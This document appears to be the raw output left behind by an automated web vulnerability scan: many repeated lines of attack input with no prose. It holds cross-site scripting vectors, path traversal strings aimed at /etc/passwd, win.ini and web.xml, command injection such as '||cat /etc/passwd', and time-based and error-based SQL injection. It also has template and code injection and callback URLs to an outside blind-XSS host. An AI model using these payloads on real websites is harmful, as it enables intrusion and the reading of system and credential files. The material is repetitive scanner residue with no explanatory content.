<img acu onmouseover=prompt(977975) //>

)

1<input autofocus onfocus=prompt(934577)>

.\./.\./.\./.\./.\./.\./etc/passwd

1

ae9qAOTM'

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

'"()

<a href='http://www.acunetix.com'>website security</a>

b9Zo47DH')

/etc/passwd

1

1

testasp.vulnweb.com

"|"ld

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

C9VHfjGI'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

'

1_ebhQf <ScRiPt >prompt(950609)</ScRiPt>

-1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

-1)

1

1

'

http://hitLTv1R1BrvF.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

................etc/passwd

-1))

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

sNgDsUo8'

1

1

comments

1

1

||cat /etc/passwd

1

http://www.acunetix.tst

SPh2vrjF')

file:///etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(938775)</ScRiPt>

comments

&dir

1Szeo0Qz'))

/\../\../\../\../\../\../\../etc/passwd

comments/.

'"()&%<ScRiPt >prompt(995641)</ScRiPt>

<!--

1

1

WEB-INF/web.xml

1

1

1

1_956153

'&dir&'

1

WEB-INF\web.xml

1

1

1

1

"&dir&"

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

'|dir

1

acu6775<s1﹥s2ʺs3ʹuca6775

1

acux4314z1z2abcxuca4314

1

windowswin.ini

"|dir

1<ScRiPt >prompt(987838)</ScRiPt>

1

1

1

1<script>prompt(935639)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(911147)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952489></ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(936810)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(991759)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918279)"></g></svg>

1

1

1

1<div style=width:expression(prompt(945433))>

response.write(9430886*9414626)

1

1

1<iframe src='data:text/html

'+response.write(9430886*9414626)+'

1

&cat /etc/passwd&

1

"+response.write(9430886*9414626)+"

1<body onload=prompt(944098)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

'&cat /etc/passwd&'

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918697)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<img src=xyz OnErRor=prompt(959371)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(970801)>

${99859+99506}

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1&n920342=v908276

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(961315)</sCripT>

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

)

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<img acu onmouseover=prompt(925927) //>

!(()&&!|*|*|

'|'ld

1

SSqPg1x6'

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

'

1

1<input autofocus onfocus=prompt(916675)>

^(#$!@#$)(()))******

1

"|"ld

1

yp1BwnsE')

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

KNHJHhGS'))

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

1

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_itXo8 <ScRiPt >prompt(916572)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

-1))

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

-1))

o9PYKT6B'

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hit7aHXrLAuVG.bxss.me/

qwLymdUM'

1

1

||cat /etc/passwd

1

1

................etc/passwd

1

acunetix_wvs_invalid_filename

1

8yC6x7RU')

W32TzrM6')

1

1

||cat /etc/passwd

1

1

................etc/passwd

1

acunetix_wvs_invalid_filename

1

ziriOh8g'))

1

1

||cat /etc/passwd

1

1

................etc/passwd

1

acunetix_wvs_invalid_filename

1

zj2ARuAi'))

8glgyHaY'))

1

1

||cat /etc/passwd

1

1

................etc/passwd

1

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"

&dir

1

1

1

comments

http://www.acunetix.tst

1

http://hit7aHXrLAuVG.bxss.me/

-1))

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"

&dir

1

1

1

comments

http://www.acunetix.tst

1

'"

file:///etc/passwd

'&dir&'

1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(107),CHAR(119),CHAR(115),CHAR(73),CHAR(76),CHAR(98),CHAR(65)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

comments

1

<!--

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(923018)</ScRiPt>

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(85),CHAR(107),CHAR(119),CHAR(115),CHAR(73),CHAR(76),CHAR(98),CHAR(65)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

comments/.

1

1

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(107)+CHAR(119)+CHAR(115)+CHAR(73)+CHAR(76)+CHAR(98)+CHAR(65)) FROM syscolumns)

|dir

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(967359)</ScRiPt>

1

1

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(85)+CHAR(107)+CHAR(119)+CHAR(115)+CHAR(73)+CHAR(76)+CHAR(98)+CHAR(65))

WEB-INF\web.xml

1

1_977019

'|dir

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(57),CHAR(83),CHAR(69),CHAR(65),CHAR(99),CHAR(121),CHAR(84),CHAR(67)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

"|dir

1

../../../../../../../../../../windows/win.ini

1

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(57),CHAR(83),CHAR(69),CHAR(65),CHAR(99),CHAR(121),CHAR(84),CHAR(67)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

1

acu7359<s1﹥s2ʺs3ʹuca7359

1

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(57)+CHAR(83)+CHAR(69)+CHAR(65)+CHAR(99)+CHAR(121)+CHAR(84)+CHAR(67)) FROM syscolumns)+'

1

../../../../../../../../../../boot.ini

1

1

acux3147z1z2abcxuca3147

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(57)+CHAR(83)+CHAR(69)+CHAR(65)+CHAR(99)+CHAR(121)+CHAR(84)+CHAR(67))+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(954155)</ScRiPt>

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(66),CHAR(68),CHAR(83),CHAR(70),CHAR(115),CHAR(107),CHAR(52)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1

windowswin.ini

1

1

1<script>prompt(916033)</script>

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(66),CHAR(68),CHAR(83),CHAR(70),CHAR(115),CHAR(107),CHAR(52)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

................windowswin.ini

1

1

1<ScRiPt >prompt(930685)</ScRiPt>

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(66)+CHAR(68)+CHAR(83)+CHAR(70)+CHAR(115)+CHAR(107)+CHAR(52)) FROM syscolumns)+"

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(66)+CHAR(68)+CHAR(83)+CHAR(70)+CHAR(115)+CHAR(107)+CHAR(52))+"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984064></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(902033)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(926470)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909200)"></g></svg>

1

1<div style=width:expression(prompt(960273))>

1

1<iframe src='data:text/html

1

response.write(9144045*9526053)

WEB-INF/web.xml

1

1

1<body onload=prompt(989765)>

1

'+response.write(9144045*9526053)+'

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915278)>

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9144045*9526053)+"

../../../../../../../../../../etc/passwd

1

1<img src=xyz OnErRor=prompt(909878)>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img/src=">" onerror=alert(935538)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

1<ScRiPt%20>prompt(920574)</sCripT>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

${100180+99141}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

-1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1&n948629=v944330

1

1

-1)

`cat /etc/passwd`

<img acu onmouseover=prompt(954570) //>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

1

-1))

|cat /etc/passwd#

1<input autofocus onfocus=prompt(927269)>

testasp.vulnweb.com

!(()&&!|*|*|

1

.\./.\./.\./.\./.\./.\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

KAu7K0FW'

'

'"()

1

'|'ld

1

^(#$!@#$)(()))******

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

kdnEiOlP')

1

"

1

"|"ld

1

1

taQzl9Jp'))

1_ICjvQ <ScRiPt >prompt(977793)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

1

1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

http://hit2qYtB9Es8V.bxss.me/

1

................etc/passwd

"

1

-1))

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

||cat /etc/passwd

1

g1E8sZZy'

comments

1

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(929625)</ScRiPt>

'"

&dir

file:///etc/passwd

QG5rLmWx')

comments/.

1

'"()&%<ScRiPt >prompt(918896)</ScRiPt>

1

<!--

uOh68jvO'))

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1_928740

1

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1

1

|dir

1

1

1

WEB-INF\web.xml

1

acu9824<s1﹥s2ʺs3ʹuca9824

'|dir

1

../../../../../../../../../../windows/win.ini

1

acux7550z1z2abcxuca7550

"|dir

1

1<ScRiPt >prompt(939700)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(973483)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(914821)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952708></ScRiPt>

1

windowswin.ini

1

1

1<ScRiPt >prompt(903438)</ScRiPt>

1

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(925494)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(941844)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<div style=width:expression(prompt(904702))>

1

1

response.write(9280695*9033637)

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9280695*9033637)+'

1

1

1

1<body onload=prompt(942097)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9280695*9033637)+"

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994491)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(929590)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(970402)>

cat /etc/passwd

1

1

1

-1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(991341)</sCripT>

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99755+100174}

1

-1)

1

1&lt

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n932822=v962906

1

1

-1))

<img acu onmouseover=prompt(953055) //>

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

)

1

WDjNpRg9'

1<input autofocus onfocus=prompt(903464)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

!(()&&!|*|*|

1

OAYrX9VV')

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

'"()

/etc/passwd

1

'

CNXSt38U'))

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

1

1

'

-1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1_Ss7yT <ScRiPt >prompt(908791)</ScRiPt>

"

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

................etc/passwd

1

fRApu1fR'

1

1

&dir

1

1

http://hitouSt5VtDcc.bxss.me/

1

acunetix_wvs_invalid_filename

0OnOkvT0')

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

comments

http://www.acunetix.tst

1

LKZtY5qV'))

1

1

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

'"

1

1'"()&%<ScRiPt >prompt(965847)</ScRiPt>

1

<!--

comments/.

|dir

1

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(927398)</ScRiPt>

1

WEB-INF\web.xml

1

1

'|dir

1

1

1

1_941602

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1

acu4156<s1﹥s2ʺs3ʹuca4156

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux2921z1z2abcxuca2921

1

1

1<ScRiPt >prompt(981296)</ScRiPt>

1

windowswin.ini

1

1<script>prompt(944859)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(900820)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951087></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(904812)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(923533)">

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948363)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9256892*9810892)

1

1

1<div style=width:expression(prompt(974004))>

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9256892*9810892)+'

1

1

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9256892*9810892)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(961391)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992755)>

cat /etc/passwd

1<img src=xyz OnErRor=prompt(951400)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1<img/src=">" onerror=alert(952319)>

1

`cat /etc/passwd`

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(958579)</sCripT>

1

${100241+99347}

|cat /etc/passwd#

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1

1

1

1

'|'ld

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(989324) //>

1&n947571=v914464

)

1

1

7gd3KFoD'

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(911708)>

.\./.\./.\./.\./.\./.\./etc/passwd

1

!(()&&!|*|*|

'"()

fHbmD2zN')

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

sJNRQ3FH'))

1

'

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1_ONuIB <ScRiPt >prompt(911769)</ScRiPt>

-1)

http://hitOpyYrpTPKB.bxss.me/

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

-1))

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

1

1

1

1

pMqXG8v6'

&dir

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

zJBH1V11')

1

http://www.acunetix.tst

'&dir&'

q4y41sj8'))

1

1

comments/.

'"

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(971892)</ScRiPt>

1

1

1

"&dir&"

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(907058)</ScRiPt>

1

|dir

1

1

1

WEB-INF/web.xml

1

1_918039

1

1

'|dir

"|dir

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu5718<s1﹥s2ʺs3ʹuca5718

windowswin.ini

1

1

1

acux5192z1z2abcxuca5192

................windowswin.ini

1

1

1<ScRiPt >prompt(977739)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(981100)</script>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(990062)</ScRiPt>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927269></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(946530)</ScRiPt>

1

response.write(9553815*9015246)

1

1<video><source onerror="javascript:prompt(983978)">

1

'+response.write(9553815*9015246)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984048)"></g></svg>

"+response.write(9553815*9015246)+"

WEB-INF/web.xml

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(970931))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(924537)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998730)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(919084)>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

1

1

1

1<img/src=">" onerror=alert(910045)>

-1)

1

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

${100485+100275}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n912183=v969391

1<ScRiPt%20>prompt(926441)</sCripT>

-1))

1some_inexistent_file_with_long_name%00.jpg

)

1

'|'ld

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1&lt

mXNzjAiZ'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/etc/passwd

"|"ld

1

1

<img acu onmouseover=prompt(907378) //>

jj6Gsqey')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(994005)>

Vq1lPvHS'))

1

'

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

"

"

1

1

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

http://hitTCtlHwWMjf.bxss.me/

1_sr241 <ScRiPt >prompt(998756)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

1

&dir

acunetix_wvs_invalid_filename

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

PNY1iYEM'

1

1

1

1

comments

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

biJm7pNG')

1

http://www.acunetix.tst

1

1

'"

comments

1'"()&%<ScRiPt >prompt(978103)</ScRiPt>

"&dir&"

TaxOUSBW'))

WEB-INF/web.xml

1

1

1

<!--

'"()&%<ScRiPt >prompt(966439)</ScRiPt>

1

comments/.

|dir

1

WEB-INF\web.xml

1

1

1_982141

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

acu2482<s1﹥s2ʺs3ʹuca2482

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux5383z1z2abcxuca5383

windowswin.ini

1

1

1

1

1<ScRiPt >prompt(949981)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(980458)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(994997)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952982></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(989101)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(954440)">

1

1

response.write(9411218*9155384)

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943850)"></g></svg>

1

1

1

&cat /etc/passwd&

'+response.write(9411218*9155384)+'

1<div style=width:expression(prompt(965097))>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

"+response.write(9411218*9155384)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(996150)>

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942823)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(933116)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

${99302+100362}

1

1<img/src=">" onerror=alert(979418)>

1

`cat /etc/passwd`

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<ScRiPt%20>prompt(943571)</sCripT>

1

1
